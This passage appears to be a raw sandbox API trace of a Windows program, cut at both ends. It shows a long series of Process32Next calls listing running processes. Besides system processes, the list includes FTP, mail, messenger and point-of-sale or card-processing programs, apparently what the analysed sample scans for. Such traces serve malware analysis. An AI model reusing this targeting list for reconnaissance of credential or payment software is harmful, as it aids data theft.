szExeFile="svchost.exe")) returned 1 [0166.742] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.744] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0166.814] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.817] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.819] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.820] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.822] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.823] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.825] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.827] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0166.828] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0166.829] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.831] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0166.833] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.835] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0166.836] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0166.838] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0166.839] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0166.841] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0166.843] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.844] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.846] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.847] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0166.849] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.853] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.855] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.856] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.858] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0166.860] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0166.862] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0166.863] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0166.865] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0166.866] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0166.869] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0166.872] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0166.874] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0166.876] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0166.878] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0166.880] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0166.884] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0166.887] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0166.889] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0166.899] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0166.901] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0166.903] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0166.906] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0166.908] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0166.910] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0166.912] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0166.915] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0166.918] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0166.921] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0166.937] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0166.940] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0166.943] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0166.946] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0166.953] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0166.955] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0166.958] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0166.960] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0166.964] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0166.966] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0166.969] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0166.972] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0166.974] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0166.977] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0166.979] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0166.982] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0166.987] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0166.993] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0166.995] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0166.998] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0167.001] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0167.003] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0167.006] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0167.008] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0167.011] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0167.013] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0167.015] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0167.018] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0167.021] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0167.023] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0167.025] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0167.028] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0167.035] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 